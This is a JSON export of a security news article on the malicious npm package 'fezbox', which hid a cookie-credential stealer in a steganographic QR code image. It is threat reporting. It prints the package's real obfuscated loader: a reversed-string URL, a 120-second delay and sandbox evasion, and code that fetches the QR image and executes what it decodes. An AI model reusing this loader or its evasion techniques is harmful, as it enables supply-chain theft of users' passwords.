{"id":127652,"date":"2025-09-23T23:49:55","date_gmt":"2025-09-23T23:49:55","guid":{"rendered":"https:\/\/cybersecuritynews.com\/?p=127652"},"modified":"2025-09-23T23:50:06","modified_gmt":"2025-09-23T23:50:06","slug":"new-malware-in-npm-package-steals-browser-passwords","status":"publish","type":"post","link":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/","title":{"rendered":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code"},"content":{"rendered":"\n<p>A sophisticated malware campaign has emerged in the npm ecosystem, utilizing an innovative steganographic technique to conceal malicious code within QR codes.<\/p>\n\n\n\n<p>The malicious package, identified as &#8220;fezbox,&#8221; presents itself as a legitimate JavaScript\/TypeScript utility library while secretly executing password-stealing operations through a cleverly disguised QR code payload.<\/p>\n\n\n\n<p>This attack represents a significant evolution in supply chain threats, demonstrating how cybercriminals are adopting increasingly creative methods to bypass security measures and evade detection systems.<\/p>\n\n\n\n<p>The fezbox package masquerades as a comprehensive utility library offering TypeScript support, performance optimization, and modular functionality.<\/p>\n\n\n\n<p>According to its documentation, the package provides common helper functions organized by feature modules, allowing developers to import only necessary components.<\/p>\n\n\n\n<p>While the README file mentions a QR Code Module for generating and parsing <a href=\"https:\/\/cybersecuritynews.com\/qr-codes\/\" target=\"_blank\" rel=\"noreferrer noopener\">QR codes<\/a>, it deliberately omits crucial details about the package&#8217;s capability to fetch QR codes from remote URLs and execute embedded malicious code.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh0Pv3S0mEBwcWDqmMjtfhHcwdhJ6Jm-wteazpZpp-0uQkCduwu8J7tVXWZtMGvRc7uGqmSuvjt3x3fw7rQgA2RYb1SZfoTkGRGbcXkULDknxmHPwWJKko_eYVYeXxe7FwBZpoK0eEpi090hu5qqI7zOm4TxLVA7CXK0LNbJat7Q1coEQP874by7XTfktQ\/s16000\/Image%20of%20the%20QR%20code%20(Source%20-%20Socket.dev).webp\" alt=\"\" \/><figcaption class=\"wp-element-caption\">Image of the QR code (Source &#8211; Socket.dev)<\/figcaption><\/figure><\/div>\n\n\n<p>Socket.dev analysts <a href=\"https:\/\/socket.dev\/blog\/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the malware after detecting suspicious behavioral patterns within the package&#8217;s codebase.<\/p>\n\n\n\n<p>The security team discovered multiple layers of obfuscation techniques, including string reversal, code minification, and the novel use of steganographic QR codes to hide the final payload.<\/p>\n\n\n\n<p>At the time of discovery, the malicious package remained active on the npm registry, prompting Socket.dev to petition the npm security team for its immediate removal and the suspension of the threat actor&#8217;s account.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-advanced-steganographic-payload-delivery\"><strong>Advanced Steganographic Payload Delivery<\/strong><\/h2>\n\n\n\n<p>The malware employs a sophisticated multi-stage execution process that begins with environmental checks and timing delays to evade sandbox detection.<\/p>\n\n\n\n<p>The initial <a href=\"https:\/\/cybersecuritynews.com\/github-actions-workflows-to-steal-pypi\/\" target=\"_blank\" rel=\"noreferrer noopener\">malicious code<\/a> contains browser-specific conditionals that verify the presence of window and document objects, ensuring execution only occurs in legitimate browser environments.<\/p>\n\n\n\n<p>When conditions are met, the malware waits 120 seconds before initiating the payload retrieval process.<\/p>\n\n\n\n<p>The core malicious functionality revolves around a reversed URL string that conceals the location of the steganographic QR code:-<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(function () {\n    if (n.isDevelopment() || c.chance(2 \/ 3))\n        return;\n    setTimeout(async () =&gt; {\n        const loader = new d.QRCodeScriptLoader();\n        const t = await loader.parseQRCodeFromUrl(\n            \"gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b\/6177675571v\/daolpu\/egami\/qsqbneuhd\/moc.yrani\"\n            .split(\"\")\n            .reverse()\n            .join(\"\")\n        );\n        loader.executeCode(t);\n    }, 120 * 1e3);\n})();<\/code><\/pre>\n\n\n\n<p>When reversed, this string resolves to a Cloudinary-hosted QR code image containing the final malicious payload. The QR code itself serves as a steganographic container, hiding <a href=\"https:\/\/cybersecuritynews.com\/javascript-attacks-targeting\/\" target=\"_blank\" rel=\"noreferrer noopener\">JavaScript<\/a> code that extracts username and password values from browser cookies.<\/p>\n\n\n\n<p>Once decoded, the payload attempts to locate cookies containing authentication credentials, specifically searching for &#8220;username&#8221; and &#8220;password&#8221; fields using additional string obfuscation techniques.<\/p>\n\n\n\n<p>The extracted credentials are then exfiltrated through an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.<\/p>\n\n\n\n<p>This multi-layered approach &#8211; combining environmental evasion, timing delays, string reversal, <a href=\"https:\/\/cybersecuritynews.com\/new-steganographic-malware-exploits-jpeg-files\/\" target=\"_blank\" rel=\"noreferrer noopener\">steganographic<\/a> concealment, and credential extraction &#8211; represents a sophisticated evolution in npm-based supply chain attacks that security teams must prepare to defend against.<\/p>\n\n\n\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A sophisticated malware campaign has emerged in the npm ecosystem, utilizing an innovative steganographic technique to conceal malicious code within QR codes. The malicious package, identified as &#8220;fezbox,&#8221; presents itself as a legitimate JavaScript\/TypeScript utility library while secretly executing password-stealing operations through a cleverly disguised QR code payload. This attack represents a significant evolution in [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":127740,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[11,48],"tags":[149,151],"class_list":{"0":"post-127652","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-security-news","8":"category-threats","9":"tag-cyber-security","10":"tag-cyber-security-news"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v25.7.1 (Yoast SEO v25.7) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code<\/title>\n<meta name=\"description\" content=\"Malicious npm package &#039;fezbox&#039; hides password-stealing code in QR images via steganography, posing as a legit JS\/TS utility library.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code\" \/>\n<meta property=\"og:description\" content=\"Malicious npm package &#039;fezbox&#039; hides password-stealing code in QR images via steganography, posing as a legit JS\/TS utility library.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/\" \/>\n<meta property=\"og:site_name\" content=\"Cyber Security News\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Hackingtutorialsandnews\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-23T23:49:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-23T23:50:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp\" \/><meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Tushar Subhra Dutta\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:site\" content=\"@The_Cyber_News\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Tushar Subhra Dutta\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code","description":"Malicious npm package 'fezbox' hides password-stealing code in QR images via steganography, posing as a legit JS\/TS utility library.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/","og_locale":"en_US","og_type":"article","og_title":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code","og_description":"Malicious npm package 'fezbox' hides password-stealing code in QR images via steganography, posing as a legit JS\/TS utility library.","og_url":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/","og_site_name":"Cyber Security News","article_publisher":"https:\/\/www.facebook.com\/Hackingtutorialsandnews","article_published_time":"2025-09-23T23:49:55+00:00","article_modified_time":"2025-09-23T23:50:06+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp","type":"","width":"","height":""},{"width":1600,"height":900,"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp","type":"image\/jpeg"}],"author":"Tushar Subhra Dutta","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp","twitter_creator":"@The_Cyber_News","twitter_site":"@The_Cyber_News","twitter_misc":{"Written by":"Tushar Subhra Dutta","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#article","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/"},"author":{"name":"Tushar Subhra Dutta","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c"},"headline":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code","datePublished":"2025-09-23T23:49:55+00:00","dateModified":"2025-09-23T23:50:06+00:00","mainEntityOfPage":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/"},"wordCount":469,"publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"image":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp?w=1600&resize=1600,900&ssl=1","keywords":["cyber security","cyber security news"],"articleSection":["Cyber Security News","Threats"],"inLanguage":"en-US","copyrightYear":"2025","copyrightHolder":{"@id":"https:\/\/cybersecuritynews.com\/#organization"}},{"@type":"WebPage","@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/","url":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/","name":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code","isPartOf":{"@id":"https:\/\/cybersecuritynews.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#primaryimage"},"image":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp?w=1600&resize=1600,900&ssl=1","datePublished":"2025-09-23T23:49:55+00:00","dateModified":"2025-09-23T23:50:06+00:00","description":"Malicious npm package 'fezbox' hides password-stealing code in QR images via steganography, posing as a legit JS\/TS utility library.","breadcrumb":{"@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#primaryimage","url":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp?w=1600&resize=1600,900&ssl=1","contentUrl":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp?w=1600&resize=1600,900&ssl=1","width":"1600","height":"900"},{"@type":"BreadcrumbList","@id":"https:\/\/cybersecuritynews.com\/new-malware-in-npm-package-steals-browser-passwords\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/cybersecuritynews.com\/"},{"@type":"ListItem","position":2,"name":"New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code"}]},{"@type":"WebSite","@id":"https:\/\/cybersecuritynews.com\/#website","url":"https:\/\/cybersecuritynews.com\/","name":"Cyber Security News","description":"World&#039;s #1 Premier Cybersecurity and Hacking News Portal","publisher":{"@id":"https:\/\/cybersecuritynews.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/cybersecuritynews.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/cybersecuritynews.com\/#organization","name":"Cyber Security News","url":"https:\/\/cybersecuritynews.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/","url":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","contentUrl":"https:\/\/cybersecuritynews.com\/wp-content\/uploads\/2021\/06\/Cyber-security.jpg","width":200,"height":200,"caption":"Cyber Security News"},"image":{"@id":"https:\/\/cybersecuritynews.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Hackingtutorialsandnews","https:\/\/x.com\/The_Cyber_News","https:\/\/www.linkedin.com\/company\/cybersecurity-news\/"]},{"@type":"Person","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/7eb7d8d026aa5dd566f134d4def5c05c","name":"Tushar Subhra Dutta","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/cybersecuritynews.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f8bc0247220c7d4dea6c8b5a77d910613305ead17b13c2a7920b400435a848dd?s=96&d=mm&r=g","caption":"Tushar Subhra Dutta"},"description":"Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.","url":"https:\/\/cybersecuritynews.com\/author\/tushar\/"}]}},"jetpack_featured_media_url":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhTRoDS-OPxCfnRsbKGlnJEf3AA2THnsxE3OExbv3bvBa4lEXMGi4gKkUSDMwYkTTf7Oi4CYYc1eV6J0V1weLOwZYrqyMSJ168razpoipeBuZ_eiZQ9zSwu9UvzflOYZR5479D2ChkG7pqJWvYruXWzf5FHFFeNn0NUOJPZOZRMdfznK6syVWnoV6_13Pc\/s16000\/New%20Malware%20in%20npm%20Package%20Steals%20Browser%20Passwords%20Using%20Steganographic%20QR%20Code.webp?w=1600&resize=1600,900&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/127652","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/comments?post=127652"}],"version-history":[{"count":1,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/127652\/revisions"}],"predecessor-version":[{"id":127739,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/posts\/127652\/revisions\/127739"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media\/127740"}],"wp:attachment":[{"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/media?parent=127652"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/categories?post=127652"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecuritynews.com\/wp-json\/wp\/v2\/tags?post=127652"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}